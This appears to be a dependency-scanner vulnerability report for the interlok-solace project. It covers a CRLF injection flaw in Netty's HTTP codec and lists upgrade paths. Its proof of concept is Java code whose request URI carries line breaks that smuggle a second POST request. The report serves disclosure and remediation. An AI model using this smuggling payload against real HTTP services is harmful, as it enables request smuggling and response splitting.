Vulnerabilities

 1 via 4 paths

Dependencies

 32

Source

 GitHub

Commit

 d38316a5

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Severity
  • 1
Status
  • 1
  • 0
  • 0

medium severity

CRLF Injection

  • Vulnerable module: io.netty:netty-codec-http
  • Introduced through: com.solacesystems:sol-jcsmp@10.29.0 and com.solacesystems:sol-jms@10.29.0

Detailed paths

  • Introduced through: adaptris/interlok-solace@adaptris/interlok-solace#d38316a5e861d26acfae930f05a1f88ced3e858b com.solacesystems:sol-jcsmp@10.29.0 io.netty:netty-codec-http@4.2.7.Final
    Remediation: Upgrade to com.solacesystems:sol-jcsmp@10.29.1.
  • Introduced through: adaptris/interlok-solace@adaptris/interlok-solace#d38316a5e861d26acfae930f05a1f88ced3e858b com.solacesystems:sol-jms@10.29.0 io.netty:netty-codec-http@4.2.7.Final
    Remediation: Upgrade to com.solacesystems:sol-jms@10.29.1.
  • Introduced through: adaptris/interlok-solace@adaptris/interlok-solace#d38316a5e861d26acfae930f05a1f88ced3e858b com.solacesystems:sol-jcsmp@10.29.0 io.netty:netty-handler-proxy@4.2.7.Final io.netty:netty-codec-http@4.2.7.Final
    Remediation: Upgrade to com.solacesystems:sol-jcsmp@10.29.1.
  • Introduced through: adaptris/interlok-solace@adaptris/interlok-solace#d38316a5e861d26acfae930f05a1f88ced3e858b com.solacesystems:sol-jms@10.29.0 io.netty:netty-handler-proxy@4.2.7.Final io.netty:netty-codec-http@4.2.7.Final
    Remediation: Upgrade to com.solacesystems:sol-jms@10.29.1.

Overview

io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.

Affected versions of this package are vulnerable to CRLF Injection in HttpRequestEncoder, due to improper sanitization of a URI with line-breaks in the DefaultHttpRequest class. An attacker can manipulate HTTP requests to cause parser desynchronization, request smuggling, and response splitting by including line break characters in requests.

PoC


public static void main(String[] args) {

  EmbeddedChannel client = new EmbeddedChannel();
  client.pipeline().addLast(new HttpClientCodec());

  EmbeddedChannel server = new EmbeddedChannel();
  server.pipeline().addLast(new HttpServerCodec());
  server.pipeline().addLast(new ChannelInboundHandlerAdapter() {
    @Override
    public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception {
      System.out.println("Processing msg " + msg);
    }
  });

  DefaultHttpRequest request = new DefaultHttpRequest(
    HttpVersion.HTTP_1_1,
    HttpMethod.GET,
    "/s1 HTTP/1.1\r\n" +
      "\r\n" +
      "POST /s2 HTTP/1.1\r\n" +
      "content-length: 11\r\n\r\n" +
      "Hello World" +
      "GET /s1"
  );
  client.writeAndFlush(request);
  ByteBuf tmp;
  while ((tmp = client.readOutbound()) != null) {
    server.writeInbound(tmp);
  }
}

Remediation

Upgrade io.netty:netty-codec-http to version 4.1.129.Final, 4.2.8.Final or higher.

References

CRLF Injection vulnerability report